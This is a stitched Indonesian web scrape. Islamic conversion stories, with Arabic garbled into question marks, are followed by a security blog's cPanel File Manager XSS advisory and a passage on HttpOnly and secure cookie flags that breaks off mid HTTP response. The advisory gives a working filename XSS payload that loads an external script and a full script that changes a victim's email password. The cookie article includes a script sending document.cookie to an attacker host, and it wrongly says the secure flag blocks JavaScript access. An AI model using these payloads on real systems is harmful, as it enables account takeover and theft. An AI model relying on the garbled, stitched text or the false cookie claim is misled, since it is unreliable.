Setelah beberapa tahun semenjak ia masuk Islam; dalam suatu kesempatan Muslim Youth Gathering si pemuda Kanada tadi menceritakan riwayat hidupnya kepada sesama peserta. Termasuk ia menceritakan soal pengalaman awalnya mendapat hidayah di pangkalan pemadat. Sewaktu ia sedang menceritakan pengalamannya salah seorang peserta berkomentar: ”Jelek sekali pemuda muslim Maroko dan Aljazair itu berada di tempat para pemadat yang terkutuk!”
Maka dengan suara tinggi si pemuda Kanada tersebut berkata: ”Saya tidak tahu di mana keberadaan dan bagaimana nasib kedua pemuda yang ngobrol dengan saya di pangkalan pemadat itu. Tapi suatu hal yang perlu Anda ketahui bahwa jika saat ini saya beramal sholeh atau beribadah; entah itu sholat atau puasa atau yang lainnya, maka kedua pemuda Maroko dan Aljazair tadi mendapat bagian dari pahala kebaikan yang saya kerjakan. Sebab merekalah yang telah berjasa pertama kali memberi hidayah iman dan Islam kepada saya.”
Demikianlah, betapa besarnya ganjaran berda’wah mengajak manusia ke jalan hidayah iman dan Islam.
???? ????? ??????????
????? ??????? ??????? ?????? ??????? ???????? ????????? ????? ???? ????? ????? ????? ????? ???? ???? ????????? ?????? ??????? ???? ???????? ??? ???????? ?????? ???? ??????????? ??????? ?????? ????? ????? ????????? ????? ???????? ???? ????????? ?????? ?????? ???? ???????? ??? ???????? ?????? ???? ?????????? ???????
Dari Abu Hurairah radhiyallahu ’anhu bahwa sesungguhnya Rasulullah shollallahu ’alaih wa sallam bersabda: “Barangsiapa mengajak kepada petunjuk maka baginya pahala seperti pahala orang yang mengikutinya tanpa mengurangi sedikitpun pahala orang yang mengikutinya. Dan barangsiapa mengajak kepada kesesatan maka baginya dosa seperti dosa orang yang mengikutinya tanpa mengurangi sedikitpun dosa orang yang mengikutinya.” (HR Muslim 13/164)
Itulah di antara rahasia mengapa dalam ajaran Islam kita diperintahkan untuk mendoakan sholawat dan salam bagi Rasulullah shollallahu ’alaih wa sallam sebab beliau adalah orang paling pertama yang berjasa menyebarkan hidayah iman-Islam ke tengah ummat manusia. Allahumma sholli wa sallim wa baarik ’ala Muhammadin wa ’ala aalihi wa ashabihi wa man tabi’ahum bi ihsaanin ilaa yaumid-diin… (eramuslim)
Oleh Ihsan Tandjung

Anna Marcelina Masuk Islam setelah Mendapat Mimpi

Nama saya, Anna Marcelina. Saya anak kelima dari tujuh bersaudara, iahir dalam keluarga Kristen (Protestan) yang tergolong fanatik. Semula, mama saya seorang Muslimah, tapi kemudian masuk Kristen karena desakan ekonomi. Mama lebih mengorbankan akidahnya ketimbang harus berpisah dengan ayah.
Yang saya ketahui tentang keluarga mama hingga saat ini, mereka masih mempertahankan agama Islam, hanya mama saja yang tergoda pindah agama menjadi Kristiani, mengikuti ayah. Setelah ayah meninggal dunia, mama saya kurang menjalani agamanya yang baru sebagai Kristiani. Suatu ketika, saya menegur, kenapa mama tak pernah berdo’a dan ikut kebaktian. Tapi teguran saya itu tak digubris oleh mama. Seiring perjalanan waktu, saya menikah dengan seorang laki-laki Muslim.
Sebagai istri, saya bertekad untuk tetap mempertahankan iman Kristiani saya. Dan suami saya pun tetap pada akidah Islamnya. Meski berbeda akidah, saya tetap menghormati suami, begitu pula suami saya tidak memaksa saya pindah agama. Saya tahu, dalam Islam, tidak ada paksaan dalam beragama. Bagiku agamaku, bagimu agamamu. Prinsip itu diikuti oleh suami saya.
Memang, dulu saya menikah dengan cara Islam. Tapi saya tidak menjadikan itu sebagai jalan untuk menjadi seorang Musilmah. Selama mengarungi rumah tangga yang baru seumur jagung, suami saya banyak membimbing saya dengan kesabaran dan kelembutan. Padahal, jujur saja, saya sempat berpikir untuk mengkristen dia, termasuk mengkristenkan saudara ibu saya. Tapi pikiran itu selaiu gagal untuk diwujudkan.
Sebelum menikah, saya adalah seorang aktivis gereja di Bandung. Boleh dibiiang, saya bukan sekadar penganut Kristen biasa. Saya tergolong seorang yang militan. Kata teman-teman di gereja, saya punya kharisma. Entahlah. Yang jelas, saya sering mengajak dan menyampaikan kebenaran Kristen. Bahkan ketika saya masih kuliah, saya sempat mendirikan persekutuan do’a dan kebaktian di kampus. Padahal sebelumnya tak pernah ada kegiatan kerohanian Kristen.
Lebih dari itu, saya bahkan pernah mengkristenkan dua orang Muslim, yang kebetulan dari golongan yang kurang educated. Tanpa melalui diskusi atau debat, cukup saya memberi pengertian tentang ajaran kaslh terhadap sesama. Dengan kata lain, saya menggunakan cara-cara yang halus dan lebih menggunakan pendekatan yang simpatik. Berbeda dengan lapisan masyarakat yang educated, mereka harus dihadapi melalui perdebatan lebih dulu. Alhasil, saya dapat merangkul beberapa Muslim lainnya.
Dalam dakwah Kristen dikenal istilah “Jadilah penjala ikan”. Ikan itu adalah manusia, dan kitalah yang menjalanya. Ketika sudah menjadikan diri sebagai penjaia ikan, maka harus ada follow up-nya. Sebagai penjala ikan, saya belum sampai menggunakan uang atau materi untuk mengajak mereka yang Muslim. Saya hanya menggunakan pendekatan yang lebih persuasif.
Lagipula, saya bukanlah seorang misionaris. Saya hanya jadi pengikut saja. Artinya, saya memang belum menjadi seorang misionaris dalam pengertian sesungguhnya, yang menyampaikan ajaran Kasih Kristus ke penjuru dunia, mulai dari kota hingga daerah terpencil. Sejauh itu, saya hanya menyampaikan firman Allah, dan mengajarkan nyanyian puji-pujian saja.
Asli, sejak saya lahir, saya tidak pernah mengenal apalagi mencari tahu tentang Islam. Meskipun mama saya awalnya Muslimah, saya tak ingin menyentuh hal-hal yang berkaitan dengan Islam. Itu, mungkin, karena saya seorang Kristen fanatik.
Lalu, apa yang membuat saya ingin memeluk Islam? Kedengarannya sepele, suatu malam saya bermimpi dikelilingi oleh ibu-ibu berbusana Muslim, mengenakan jilbab putih bersih, dan menggenggam tasbih seraya melafazkan La Ilaha Illallah. Gemuruh suara itu membuat hati saya bergetar dan membuat saya terisak-isak. Saat terbangun, saya pun bertanya-tanya tentang takwil mimpi saya semalam, terutama kalimat La Ilaha Illallah. Setelah saya mencari tahu, ternyata saya baru memahami, bahwa kalimat tauhid itu bermakna Tiada Tuhan Selain Allah.
Entah kenapa, saya yang dikenal sebagai seorang Kristiani yang fanatik, merasa yakin bahwa mimpi itu bukan sembarang mimpi atau bukan sekadar kembang tidur. Anehnya, saya langsung percaya. Dalam hati kecil saya, ini seperti petunjuk dan jalan terang bagi saya.
Kalau ditanya, kenapa saya langsung percaya? Karena memang, saya selalu meyakini setiap mimpi sebagai firasat dan petunjuk dari Yang Kuasa. Boleh dibiiang, saya punya kelebihan untuk menjadikan mimpi saya sebagai petunjuk. Sebelumnya, pernah saya bermimpi adik saya sedang dirawat di sebuah rumah sakit di Jakarta.
Anehnya, mimpi saya itu selalu menjadi kenyataan. Waktunya pun berlangsung cepat. Malamnya bermimpi, esoknya betul-betul terjadi. Bahkan jauh sebelumnya, saya pernah bermimpi saudara saya meninggal, esok harinya benar-benar terjadi. Umumnya, seseorang yang bermimpi sekitar pukul 2.00 pagi hingga menjelang Subuh, biasanya akan menjadi kenyataan. Karena pada saat itu, bukan sekedar mimpi, tapi sebuah firasat yang sangat kuat.
Setelah mimpi yang pertama, kegelisahan saya semakin bertambah ketika saya mendengar adzan Subuh berkumandang. Saya merasakan keanehan. Setiap kali saya mendengar adzan Subuh, pasti saya terbangun dan tidur saya. Padahal, sebelumnya saya selalu bangun agak siang, saat matahari mulai meninggi.
Untuk kedua kalinya, saya lagi-lagi bermimpi, seseorang berlutut (bersujud) dengan mengenakan sorban putih. Kemudian orang itu berdo’a, “Semoga kamu meraih kebahagiaan di dunia yang sekarang dan kebahagiaan di akhirat kelak.”
Setelah mimpi berturut-turut, saya tak kuat menyimpannya sendiri. Saya menceritakannya kepada suami saya. Suami saya agak surprise dan mendengarnya dengan penuh perhatian. Akhirnya, tahun 2004, saya memutuskan untuk masuk Islam. Saya diislamkan di sebuah pulau terpencil di luar Jawa. Sejak saya menjadi Muslimah, saya berganti nama menjadi Siti Masitoh.
Saya teringat, ketika pertama kali shalat, hati saya terasa bergetar. Apalagi jika ayat-ayat Tuhan diperdengarkan, hati saya pun semakin tambah bergetar. Masa transisi dari Kristen menuju Islam, saya rasakan ujian yang sangat berat. Di samping berpisah dengan keluarga, silaturrahim terputus, saya juga mendapat kesulitan ekonomi.
Hingga suatu malam, saya memohon dan bermunajat kepada Allah, agar Allah memberi kemudahan dan menguatkan kesabaran saya. Alhasil, do’a saya langsung dijawab Allah, betul-betul instan. Sebagai seorang guru, saya belum menerima gaji bulanan. Padahal, uang saya ketika itu tinggal Rp. 15.000,-, sementara tanggal 30 masih jauh. Mengandalkan suami, tentu tidak mungkin, mengingat suami saya berprofesi sebagai wiraswasta kecil-kecilan.
Begitu saya shalat Tahajud dan bermunajat kepada Allah dengan penuh kesungguhan, tanpa diduga saya menerima telepon dari teman satu gereja saya dulu yang sedang berada di Arab Saudi untuk mentransfer uang sebesar Rp. 1 juta. Saat itu, saya bertambah yakin, Allah sungguh Mahahidup. Dia tahu kegelisahan dan penderitaan hambaNya. Padahal kawan saya itu belum tahu, bahwa saya sudah menjadi seorang Muslimah.
Setahun berjalan menjadi Muslimah, saya sering mengenang dosa-dosa yang telah saya perbuat di masa lalu. Dalam kesendirian, di tengah malam yang sunyi, jiwa saya merintih, air mata ini tak mampu lagi saya bendung. Sedih, kalau saya ingat bahwa saya dulu bukan orang baik, apalagi sempat mengkristenkan beberapa orang Islam. Ingin sekali saya menebus dosa-dosa saya, meski saya harus memulai hidup ini dari nol lagi. Apa pun yang terjadi, saya serahkan seluruh hidup saya kepada Allah. Saya hanya ingin mendapat ampunan dan ridhaNya.
Terakhir, saya ingat, saya sempat pamit pada ibu saya. Terus terang, hanya ibu yang tahu dengan keislaman saya. Sementara saudara-saudara saya yang lain belum mengetahui. Sejak saya menikah, hubungan saya dengan saudara-saudara yang lain terputus.
Saya memang berusaha menyembunyikan keislaman saya. Saya khawatir dengan keselamatan diri saya dan keluarga saya. Karena saya tahu, keluarga dari pihak kakak-kakak saya adalah orang-orang keras. Mereka tidak segan-segan mencederai saya, kalau tahu saya memeluk Islam. Tapi, bagi saya, kebenaran itu harus diungkapkan, jangan disembunyikan. Hanya Allah lah sebaik-baik Pelindung.
Banyak hal yang saya dapatkan setelah masuk Islam. Selain rasa ketenangan, saya juga menilai Islam adalah agama yang mengutamakan disiplin. Setiap saya bangun malam untuk shalat Tahajud, saya merasa dekat dengan Tuhan. Terlebih, saat Subuh, saya selalu berjama’ah dengan suami. Kemantapan iman saya semakin kokoh, ketika saya mengikuti workshop ESQ pimpinan Ary Ginanjar. Dengan pelatihan itu, iman saya seperti di-ces kembali. [amanahonline]

Cpanel File Manager XSS Attack


in Advisory, Web Security, by Rizki Wicaksono
cpanel1
Cpanel adalah aplikasi pengelolaan hosting yang sangat vital karena dengan aplikasi ini seseorang bisa mengelola semua hal yang terkait dengan hosting antara lain website, email, kunci SSL dan PGP, mysql database, DNS, domain dan masih banyak lagi. Oleh karena itu sangat berbahaya bila account cpanel seseorang berhasil dibajak orang lain. Dalam artikel ini akan saya jelaskan salah satu serangan yang sangat berbahaya, yaitu XSS (Cross Site Scripting) pada File Manager Cpanel, serangan ini menyerang pengguna yang sedang login dalam cpanel, kemudian menjalankan script dengan hak yang sama dengan pemilik account cpanel. Vulnerability ini saya temukan di cpanel versi 11.24.4-CURRENT, diuji coba dengan browser Firefox 3.0.7.

Sekilas tentang CPanel File Manager
cpanel2
Cpanel terdiri dari berbagai macam aplikasi, salah satunya adalah file manager, yang berfungsi untuk mengelola file dalam account hosting. Dengan file manager, seorang pengguna bisa menghapus, membuat, mengedit file dalam file system.
File manager pada cpanel ada dua, yaitu “File Manager” dan “Legacy File Manager”. Perbedaan keduanya hanya pada soal tampilan saja. Legacy adalah versi dengan tampilan yang lebih sederhana dan tidak terlalu banyak menggunakan javascript. Namun dari sisi fungsi keduanya relatif sama, hanya ada penambahan fitur compress, ekstrak pada versi modernnya.
standard file manager
standard file manager

legacy file manager
legacy file manager
Persistent XSS Attack by Crafting Malicious File Name
Kedua jenis file manager cpanel rentan terhadap serangan XSS. File manager cpanel tidak memfilter nama file yang ditampilkan di web sehingga attacker bisa menginjeksi script atau kode html dengan cara membuat file dengan nama yang mengandung kode html dan javascript.
Dilihat dari tingkat bahayanya, serangan pada Legacy File Manager lebih berbahaya karena hanya dengan melihat nama filenya saja malicious code yang dikirimkan attacker akan dieksekusi browser. Dalam file manager yang standard, cpanel berhasil memfilter karakter berbahaya dari nama file sehingga malicious code tidak dieksekusi dalam halaman daftar file. Namun, cpanel rupanya lupa untuk memfilter task delete, copy, move, code/html editor,compress, change permission. Agar malicious code attacker dieksekusi browser, korban harus memilih file tersebut dengan checkbox, kemudian melakukan salah satu diantara: delete,copy,move,edit,compress atau change permission.
Jadi jelas bahwa serangan xss ini lebih berbahaya pada Legacy File Manager, karena korban tidak perlu berbuat apa-apa lagi selain melihat daftar file dalam suatu folder. Oleh karena itu dalam artikel ini saya akan memfokuskan pembahasan pada serangan ke Legacy File Manager namun dengan exploit yang bisa bekerja di kedua jenis file manager.
Attacking Legacy File Manager (LFM)
Mari kita lihat bagaimana LGM menampilkan nama file dalam daftar file di web. Gambar di bawah ini menunjukkan bagaimana 2 file dalam suatu folder ditampilkan di web.
File list in legacy file manager
File list in legacy file manager
Ada dua file yang saya jadikan contoh di atas, yaitu:
">
filenametestonly
Ada tiga hal yang bisa disimpulkan dari cara cpanel menampilkan nama file:
  1. Tiap nama file ditulis sebagai bagian dari URL pada query string dir=PATH&file=NAMAFILE. URL tersebut diapit oleh karakter double quote sehingga attacker harus menambahkan double quote . Kemudian harus diikuti juga dengan karakter > agar menutup tag sebelumnya dan tag selanjutnya dianggap tag yang terpisah.
  2. Bila nama file mengandung karakter double quote ("), maka akan diawali dengan backslash menjadi \". Ini akan menjadi masalah, sehingga attacker harus menghindari double quote dalam nama file agar serangannya berhasil. Double quote yang boleh dimasukkan hanya pada awal nama file seperti pada paragraf di atas.
  3. Tiap nama file akan ditampilkan sebanyak 3x. Ini tidak terlalu bermasalah, hanya fakta bahwa script yang diinjeksi attacker akan dieksekusi 3x oleh browser.
Batasan dalam pembuatan nama file oleh sistem operasi juga perlu diperhatikan. Contoh dalam artikel ini menggunakan cpanel di Linux sehingga batasan nama file yang dibolehkan mengikuti aturan Linux. Nama file di linux maksimum sepanjang 256 karakter. Karakter yang terlarang digunakan salah satunya adalah slash (/). Oleh karena itu attacker harus bisa membuat serangan dengan nama file tidak lebih dari 256 karakter dan tidak boleh mengandung karakter slash.
Attack using IMG tag to load external script
Karena batasan dari cpanel dan filesystem yang dijelaskan di atas, maka attacker harus membuat nama file seperti berikut ini:
  • Panjang maksimum 256 karakter.
  • Tidak mengandung karakter terlarang seperti slash dan double quote.
Karena tidak mungkin serangan yang efektif bisa dilancarkan bila hanya mengandalkan 256 karakter saja, attacker harus membuat browser me-load external script. Sayangnya penggunaan tag script tidak dimungkinkan karena tag ini menuntut digunakannya tag yang mengandung karakter slash.
Cara yang saya pakai agar browser mau meload script external adalah:
  1. Menginjeksi javascript dalam tag img
  2. Javascript dalam tag img melakukan document.write() yang isinya adalah tag script dengan atribut src dari url luar.
Saya memilih menggunakan tag IMG karena tag ini sifatnya tunggal, tidak perlu ditutup dengan tag . Bagaimana caranya tag img bisa mengeksekusi javascript?
Awalnya saya mencoba memasukkan javascript dalam atribut SRC, namun ternyata cara ini tidak berlaku di firefox. Kemudian saya coba letakkan script dalam atribut onError, yang artinya bila image dalam tag img ini gagal diload, maka script dalam atribut onError akan dieksekusi. Dengan cara ini maka agar script dalam onError selalu dieksekusi, maka saya harus membuat image selalu gagal diload. Itu mudah saya hanya perlu mengosongkan atribut SRC, sehingga img selalu gagal loading dan artinya script selalu dieksekusi. Cara ini berhasil di Firefox dan Internet Explorer, saya belum coba untuk browser lainnya.
Ada satu masalah lagi, yaitu bagaimana cara menghindari penggunaan karakter slash dalam menyebutkan URL? URL berisi script biasanya dalam bentuk http://evilsite.com/path/file.js, sehingga minimal mengandung 3 karakter slash. Nantinya url ini akan dimasukkan dalam atribut SRC dalam tag script.
Namun tag script tidak langsung dituliskan dalam nama file, melainkan ditulis oleh javascript dalam tag img dengan fungsi document.write(). Fungsi document.write meminta masukan berupa string, yang nantinya akan kita isi dengan tag script. Karena masukannya berupa string, maka saya bisa pakai fungsi String.fromCharCode() untuk menghasilkan string dari kode ASCII.
URL external berisi script yang akan saya injeksikan adalah: http://ilmuhacking.com/x.js . Sehingga script dalam tag img harus membuat tag berikut dengan fungsi document.write():
<script src=http://ilmuhacking.com/x.js></script>
Javascript untuk membuat tag script dengan url seperti di atas adalah:
document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99,111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))
Deretan angka pada fungi String.fromCharCode adalah kode ASCII dari masing-masing karakter dari script tag yang akan meload external script. Javascript tersebut harus dimasukkan ke dalam atribut onError dari tag img. Jadi tag img yang akan dipakai untuk meload external javascript adalah berikut ini:
<img src='' onerror='document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99,111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))'>
from img to script
Sebelumnya sudah saya jelaskan bahwa nama file ditampilkan dalam source htmlnya sebagai bagian dari tag lain. Contohnya adalah tag berikut:
<a href="selfile.html?dir=/home&file=cpbackup-exclude.conf" target="filewindow">
Bila attacker memasukkan tag img, yang terjadi adalah:
<a href="selfile.html?dir=/home&file=" target="filewindow">
Perhatikan bahwa tag img tersebut terlihat sebagai bagian dari atribut href dari tag A sehingga browser tidak menganggap ada tag image. Agar attacker bisa menginjeksi tag img dengan benar, maka tag A yang melingkupi harus ditutup dulu. Cara menutupnya adalah dengan menambahkan dua karakter: “>
cpanel10
Gambar di atas adalah penjelasan mengapa diperlukan double quote dan > di awal. Dalam gambar diberikan 3 contoh, dari nama file yang normal, kemudian nama file dengan tag img, dan terakhir diawali dengan double quote dan greater than (“>). Nama file tanpa diawali “> akan menjadi bagian dari atribut href dari tag A, namun bila diawali dengan “> maka karakter sesudah 2 karakter itu sudah bukan bagian dari tag A.
Jadi sesuai penjelasan di atas, nama file yang akan dijadikan serangan harus diawali dengan “> sehingga nama file akhir yang harus dibuat untuk melakukan serangan adalah:
">
cpanel11
Dalam gambar di atas saya menunjukkan cara membuat file dengan nama yang mengandung tag img dari console Linux. Membuat file bisa juga dilakukan dengan upload file bila di web tersebut memberikan kebebasan penggunanya untuk upload misal untuk gambar profil atau album foto. Setelah file yang namanya mengandung exploit xss dibuat, maka berikutnya bila seseorang membuka cpanel dan melihat daftar file dalam folder tempat exploit xss berada, maka script attacker akan dieksekusi browser, secara otomatis, tanpa perlu pengguna berbuat sesuatu lagi.
script at http://ilmuhacking.com/x.js executed
script at http://ilmuhacking.com/x.js executed
Attacking (Standard) File Manager
Exploit yang saya jelaskan untuk LFM bisa juga dipakai untuk standard file manager. Hanya saja bedanya script yang diinjeksi attacker hanya bisa dieksekusi bila korban memilih file tersebut lalu melakukan: delete,edit,rename,copy,move,compress,change permission. Bila korban memakai standard file manager, kemungkinan code dieksekusi tidak sebesar pada LFM. Exploit yang sama bila dilihat dengan standard file manager seperti pada gambar berikut:
file list not vulnerable
file list not vulnerable
Memang file list tidak vulnerable, namun bila korban memilih file tersebut, kemudian memilih salah satu diantara: delete,copy,move,rename,change permission,compress, maka script akan dieksekusi seperti pada gambar berikut:
remote script executed
remote script executed
Remote Attack Scenario
Mungkin anda mengira serangan ini hanya bisa dilancarkan secara lokal, setidaknya harus memiliki akses membuat file. Sebenarnya serangan ini bisa dilancarkan secara remote. Salah satu skenario yang mungkin adalah:
Pada web dengan fitur album foto memungkinkan pengguna untuk upload gambar. Attacker bisa melancarkan serangan ini secara remote dengan upload file gambar dengan malicious file name, kemudian menunggu owner website browsing dengan Cpanel File Manager. Ketika cpanel file manager menampilkan file dengan malicious name ke browser owner…Boom! Ranjau diinjak korban, script attacker akan dieksekusi.
Example Payload: Changing Victim Email Address
cpanel16
Setelah berhasil membuat browser mengeksekusi remote script, kini saya bebas mengisi script dengan apa pun yang saya inginkan. Dalam artikel ini saya akan memberi contoh script untuk mengubah password email korban dengan menggunakan fungsi AJAX.
Form untuk mengubah password email tidak memerlukan current password, pengguna hanya perlu memasukkan password baru saja. Oleh karena itu saya bisa membuat script yang melakukan submit form tersebut. Script untuk mengubah password email korban adalah:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
 http_request = new XMLHttpRequest();
 if (http_request.overrideMimeType) {
 // set type accordingly to anticipated content type
    //http_request.overrideMimeType('text/xml');
    http_request.overrideMimeType('text/html');
 }
} else if (window.ActiveXObject) { // IE
 try {
    http_request = new ActiveXObject("Msxml2.XMLHTTP");
 } catch (e) {
    try {
       http_request = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e) {}
 }
}
if (!http_request) {
 alert('Cannot create XMLHTTP instance');
 return false;
}
 
http_request.onreadystatechange = alertContents;
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
 
function alertContents() {
if (http_request.readyState == 4) {
 if (http_request.status == 200) {
    //alert(http_request.responseText);
    result = http_request.responseText;
    alert(result);
 } else {
    alert('There was a problem with the request.');
 }
}
}
 
var poststr = 
     "quota=" + encodeURI("250") +
     "&password2=" + encodeURI("newpassword") +
     "&password=" + encodeURI("newpassword") +
     "&email=" + encodeURI("testing") +
     "&domain=" + encodeURI("ilmuhacking.com" );
makePOSTRequest('/frontend/x3/mail/dopasswdpop.html', poststr);
Script di atas melakukan POST request dengan fungsi AJAX, ke URL /frontend/x3/mail/dopasswdpop.html bersama dengan POST data: quota (dalam mega byte), password, password2, email dan domain.
Masih banyak payload lain yang bisa dibuat antara lain membuat user mysql baru, mencuri private key PGP dsb. Semua yang bisa dilakukan korban ketika login cpanel, bisa juga dilakukan dengan exploit script xss.
Share and Enjoy:
  • Slashdot
  • StumbleUpon
  • del.icio.us
  • Digg
  • Facebook
  • MySpace
  • Technorati
  • Google Bookmarks
  • Reddit
  • Live
  • YahooMyWeb
  • Mixx

Protecting Cookie from XSS using HttpOnly and Secure flag


  in Web Security, by Rizki Wicaksono
Dalam dunia web, session cookie adalah sesuatu yang sangat penting karena cookie adalah kunci untuk membajak session. Untuk membajak session attacker hanya perlu mencuri cookie korban. Salah satu teknik pencurian cookie adalah dengan jurus XSS (cross site scripting). Dalam artikel ini saya akan jelaskan teknik untuk melindungi cookie dari pencurian yang dilakukan dengan teknik XSS.

Sulitnya Mencegah XSS
Mencegah XSS bagi developer web sebenarnya gampang tapi susah karena developer harus memfilter setiap output ke browser pengguna yang terkadang sulit untuk dilakukan pada aplikasi yang kompleks. Bahkan dalam kondisi tertentu xss sulit dicegah karena developer harus menyeleksi mana yang boleh ditampilkan dan mana yang tidak boleh. Contohnya adalah pada aplikasi di mana pengguna hanya boleh memasukkan tag html tertentu seperti pada friendster dan myspace. Begitu banyak variasi tag html yang bisa dipakai untuk melancarkan serangan xss walaupun pengguna hanya boleh memasukkan tag tertentu saja, sehingga menyulitkan developer untuk memfilternya. Silakan baca XSS cheat sheet untuk melihat banyak sekali variasi xss yang mungkin. Perhatikan pula artikel di sini untuk melihat bagaimana xss pada myspace bisa dilakukan walaupun developer myspace sudah berusaha melakukan filtering, tapi masih tetap saja ada yang lolos.
Javascript kini jauh lebih powerful dibandingkan dulu, apalagi dengan hadirnya Web 2.0 dan Ajax. Semakin powerful javascript, semakin besar bahaya dari serangan yang mungkin dilakukan dengan javascript. XSS yang dulunya sering diremehkan kini menjelma menjadi bug yang mengerikan karena potensi serangannya yang dahsyat. Salah satu serangan yang bisa dilakukan dengan xss adalah mencuri cookie. Sebenarnya mencuri cookie hanyalah contoh kecil serangan xss, banyak kerusakan lain yang bisa dilakukan dengan xss, silakan baca vulnerability xss yang saya temukan pada cpnel di artikel: cpanel file manager xss. Dalam artikel itu saya beri contoh serangan xss pada cpanel untuk mengubah password email korban, mengerikan bukan?
document.cookie
Document.cookie adalah variabel untuk mengakses cookie di sebuah halaman web. Javascript bisa membaca, menulis dan mengubah cookie dengan memanipulasi variabel document.cookie. Karena itu, cookie menjadi rentan dicuri bila attacker bisa menginjeksi javascript di browser korban dengan XSS.
Bagaimanakah cara attacker mencuri cookie dengan xss? Sangat mudah, perhatikan script berikut:
<script>
new Image().src="http://evilsite/grabcookie.php?c="+encodeURI(document.cookie);
script>
Bila attacker berhasil menginjeksi script tersebut di sebuah web, maka attacker bisa menjadi orang lain yang menjadi korbannya. Script di atas menggunakan perilaku tag image yang akan melakukan request GET bila atribut src diubah, sehingga ketika script tersebut dieksekusi, browser korban akan melakukan request GET ke: “http://evilsite/grabcookie.php?c=VICTIMSCOOKIE” . Dengan kata lain cookie korban akan dikirimkan melalui request tersebut ke server attacker(evilsite).
httpOnly dan Secure Cookie Flag
Both httpOnly and secure flag protect cookie from javascript
Ada dua cookie bit yang bisa dipakai dalam cookie yang terkait dengan security, yaitu: httpOnly dan secure. Kedua flag tersebut sama-sama membuat cookie tidak bisa diakses dari javascript. Bila ada yang mengakses document.cookie, maka browser akan memberikan nilai string kosong. Namun kedua flag tersebut memiliki perbedaan dalam aturan pengiriman cookie ke server dalam sebuah request
Cookie dengan flag httpOnly boleh dikirim kembali ke server melalui koneksi apa saja, baik http maupun https. Flag ini dipakai untuk melindungi cookie dari javascript pada aplikasi yang tidak membutuhkan keamanan setingkat https. Tingkat keamanan yang lebih tinggi diberikan oleh flag secure. Selain membuat cookie tidak bisa diakses dari javascript, flag ini juga membuat cookie hanya boleh dikirim ke server dalam koneksi https. Dengan hanya melewatkan cookie dalam koneksi https, maka attacker tidak bisa mengintip cookie yang lewat di tengah perjalanan. Dalam artikel saya membajak session https permatanet, saya menunjukkan bagaimana cookie bisa dicuri bila cookie tidak dilindungi dengan secure flag.
Secure flag bisa juga disebut sebagai “https only” flag karena flag ini membuat cookie hanya boleh dikirim melalui koneksi https. Namun jangan bingung antara flag “https only” dengan httpOnly. Flag httpOnly bukan berarti cookie tersebut tidak boleh dikirim melalui https.
Mari kita lihat bagaimana server mengirimkan cookie ke browser dengan header Set-Cookie. Format header response Set-Cookie adalah sebagai berikut:
1
2
3
4
5
6
7
8
9
Set-Cookie: =[; =]...
[; expires=][; domain=]
[; path=][; secure][; httponly]
 
Contohnya:
Set-Cookie: PHPSESSID=b31cd5f599c4b0fa4158c6ab168c0eb2; path=/; 
Set-Cookie: PHPSESSID=b31cd5f599c4b0fa4158c6ab168c0eb2; path=/; HttpOnly
Set-Cookie: PHPSESSID=b31cd5f599c4b0fa4158c6ab168c0eb2; path=/; secure
Set-Cookie: PHPSESSID=b31cd5f599c4b0fa4158c6ab168c0eb2; path=/; secure; HttpOnly
Cookie pada baris ke-6 adalah contoh cookie yang paling umum, tanpa perlindungan apapun. Cookie semacam ini bisa dicuri dengan javascript xss, dan boleh dikirimkan melalui koneksi http maupun https sehingga rentan terhadap sniffing attack bila dikirim melalui http biasa.
Cookie pada baris ke-7 adalah contoh cookie httpOnly. Cookie semacam ini tidak bisa dicuri dengan javascript xss. Namun cookie ini boleh dikirimkan melalui koneksi http maupun https sehingga rentan terhadap sniffing attack bila dikirim melalui http biasa.
Cookie pada baris ke-8 adalah contoh cookie “https only”. Cookie semacam ini tidak bisa dicuri dengan javascript xss dan juga tidak bisa dikirim melalui http biasa sehingga kebal terhadap serangan sniffing. Cookie pada baris ke-9 sebenarnya sama saja dengan contoh pada baris ke-8. Flag secure saja sudah cukup, tidak perlu ditambahkan lagi flag httpOnly karena flag secure sudah melindungi cookie dari javascript sama seperti httpOnly.
httpOnly dan Secure Flag di PHP
Agar lebih memahami tentang flag pada cookie, saya akan memberikan contoh bagaimana membuat flag cookie pada php. Pertama saya akan membuat cookie yang tanpa memakai flag apapun. File php yang saya pakai adalah:

session_start();
?>
Hello World!
Sangat sederhana, script tersebut hanya menginisiasi session dengan fungsi session_start(). Dengan memanggil fungsi ini php akan mengirimkan cookie dengan header Set-Cookie kepada browser. Mari kita coba akses script php tersebut dari browser dan lihat apa yang terjadi.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
http://localhost/testhttponly/testcookie.php
 
GET /testhttponly/testcookie.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 GTB5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Tue, 31 Mar 2009 08:01:08 GMT
Server: Apache/2.2.9 (Win32) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=822a078b7d3144a221174b7978866760; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 12
